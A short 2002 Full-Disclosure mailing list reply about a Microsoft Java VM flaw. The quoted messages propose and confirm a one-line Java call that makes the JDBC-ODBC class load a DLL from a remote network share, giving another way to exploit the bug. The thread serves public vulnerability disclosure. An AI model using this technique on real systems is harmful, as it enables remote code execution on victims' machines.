Jouko Pynnonen wrote:
>
> On Mon, 23 Sep 2002, Georgi Guninski wrote:
>
>
>>Does
>>new com.ms.jdbc.odbc.JdbcOdbc("\\\\1.1.1.1\\share\\dll\000");
>>work?
>
>
>
> Yes, seems to work, so there's another way to exploit this one. It
> requires that browsing internet shares works, which may limit the systems
> where it can be exploited. Although there were other Java vulnerabilities
> involving the use of shares, I never came to think about this way. MS may
> have thought of this, but of course they don't mention this kind of
> things during the "co-operation".
>
>
Hehehehe - you don't expect microsoft to share info with you during
"co-operation", do you?
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
